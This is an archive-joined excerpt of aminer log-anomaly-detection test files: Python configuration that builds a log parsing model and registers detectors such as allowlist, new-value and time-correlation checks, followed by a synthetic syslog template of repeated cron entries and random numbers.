analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/Job Number'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter(sys.stdout, [ '/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests/performance-config2.py000066400000000000000000000550561437606560100322050ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.MultiLocaleDateTimeModelElement import MultiLocaleDateTimeModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [ b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [ SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('Fixed Workload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Start Time', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', "de_AT.utf8", None)])) service_children_parsing_model_element.append(RepeatedElementDataModelElement( 'RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'drawn number: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append(SequenceModelElement('', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid unexpected Matches. service_children_parsing_model_element.append(Base64StringModelElement('Base64StringModelElement')) # The OptionalMatchModelElement must be paired with a FirstMatchModelElement because it accepts all data and thus no data gets # to the AnyByteDataModelElement. The AnyByteDataModelElement must be last, because all bytes are accepted. service_children_parsing_model_element.append( OptionalMatchModelElement('OptionalMatchModelElement', FirstMatchModelElement('FirstMatchModelElement', [ FixedDataModelElement('FixedDataModelElement', b'The-searched-element-was-found!'), AnyByteDataModelElement('AnyByteDataModelElement')]))) parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address), FirstMatchModelElement('ParsingME', service_children_parsing_model_element)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers # later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_event_handler = SyslogWriterEventHandler(analysis_context) from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers = [stream_printer_event_handler, syslog_event_handler, mail_notification_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis(analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter(sys.stdout, [ '/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) syslog_high_performance-template000066400000000000000000000161711437606560100343550ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/system/performance-tests2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:13 ubuntu user cron[28683]: Job `cron.daily` started. 56 149 172 165 21 126 53 10 197 159 19 184 111 200 83 121 127 0 69 161 139 76 151 152 77 53 139 166 151 18 128 128 119 79 159 160 101 70 0 134 32 67 152 119 50 121 186 173 104 194 113 158 77 119 152 187 82 91 44 169 117 26 26 32 49 198 35 147 66 49 47 154 48 136 106 5 97 115 109 157 16 187 55 149 183 25 41 49 26 30 155 75 149 105 90 103 93 193 Random: 61646 Random: 81742 Random: 22454 Random: 61172 Random: 59230 Random: 57422 Random: 24186 Random: 13177 Random: 67097 Random: 77130 Random: 37168 Random: 42606 Random: 16250 Random: 16423 Random: 12743 Random: 47250 Random: 62026 Random: 28145 Random: 25117 Random: 11797 Random: 43684 Random: 56609 Random: 62107 Random: 57898 Random: 25565 Random: 40031 Random: 44657 Random: 34302 Random: 36463 Random: 7023 Random: 86129 Random: 41616 Random: 73781 